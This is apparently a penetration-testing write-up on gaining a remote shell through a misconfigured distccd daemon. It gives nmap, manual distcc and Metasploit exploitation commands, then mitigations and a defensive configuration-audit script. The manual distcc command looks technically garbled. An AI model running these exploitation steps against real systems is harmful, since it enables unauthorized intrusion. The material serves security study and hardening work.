distccd — Remote Command Execution via Daemon Misconfiguration

Exploiting Unauthenticated Remote Command Execution

CVE: N/A (Misconfiguration) | Port: 3632/tcp | Impact: Remote Shell | Tool: Metasploit
Severity: High
Service: GNU distcc daemon
Attack Type: RCE via Job Requests
MSF Module: exploit/unix/misc/distcc_exec
Result: ✓ Remote Shell Obtained

01. Vulnerability Overview

The distccd service is misconfigured to allow unauthenticated remote command execution. The daemon executes arbitrary commands passed to it via job requests without proper validation, leading to remote code execution.

distcc is designed for distributed compilation, but when misconfigured it becomes a dangerous service that allows remote command execution.

02. Service Detection

bash
nmap -sV -v -p 3632 <target-ip>
[Screenshot: Nmap distccd Service Version Scan]

03. Manual Exploitation

Use distcc to execute remote commands:

bash
distcc <target-ip>:3632 gcc -c /bin/sh -o /tmp/shell
[Screenshot: distccd Manual Command Execution]

04. Automated Exploitation — Metasploit

bash
msfconsole
use exploit/unix/misc/distcc_exec
set RHOSTS <target-ip>
run
[Screenshot: Metasploit distccd Exploit]

05. Results & Impact

Outcome

  • Successfully executed remote commands via distccd
  • Obtained shell access on the target system
  • Potential for full system compromise

Detection & Mitigation (Blue Team)

  • Configure distccd to only accept connections from trusted hosts
  • Use authentication and access controls
  • Restrict distccd to localhost or disable if not needed
  • Use a firewall to block port 3632 from external networks
  • Monitor distccd logs for suspicious job requests
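
A configuration check for the trusted-hosts and localhost mitigations above, as an added example that is not part of the original page: it audits a distccd command line (for instance from `ps -C distccd -o args=`) for a missing or catch-all `--allow` list and a non-loopback `--listen` address. The function name and the sample command line are constructed, and it assumes a distccd build that accepts any client when no `--allow` is given.

```sh
# Added example: audit a distccd command line for network exposure.
# --allow / -a and --listen are distccd options; sample input is constructed.

audit_distccd_args() (
    # $1: full distccd command line, e.g. output of: ps -C distccd -o args=
    # Runs in a subshell, so set -f and the variables stay local.
    set -f                          # no globbing while word-splitting "$1"
    allow_seen=0; listen=""; findings=0; prev=""
    # Treat "--opt=value" the same as "--opt value".
    for tok in $(printf '%s\n' "$1" | tr '=' ' '); do
        case "$prev" in
            --allow|-a)
                allow_seen=1
                case "$tok" in
                    */0) echo "FAIL: --allow $tok matches every client address"
                         findings=$((findings + 1)) ;;
                esac ;;
            --listen) listen="$tok" ;;
        esac
        prev="$tok"
    done
    if [ "$allow_seen" -eq 0 ]; then
        # Assumption: this build starts without --allow and accepts any client.
        echo "FAIL: no --allow access list; job requests are not restricted by source"
        findings=$((findings + 1))
    fi
    case "$listen" in
        127.*|::1) ;;               # loopback only
        "") echo "WARN: no --listen; daemon binds every interface on its port"
            findings=$((findings + 1)) ;;
        *)  echo "WARN: --listen $listen is network-reachable; firewall 3632/tcp"
            findings=$((findings + 1)) ;;
    esac
    exit "$findings"                # exit status = number of findings
)

# Constructed sample: a daemon started with no access list and no bind address.
audit_distccd_args "distccd --daemon --user daemon" || true
```

The exit status is the number of findings, so the function can gate a hardening check in a configuration-management run.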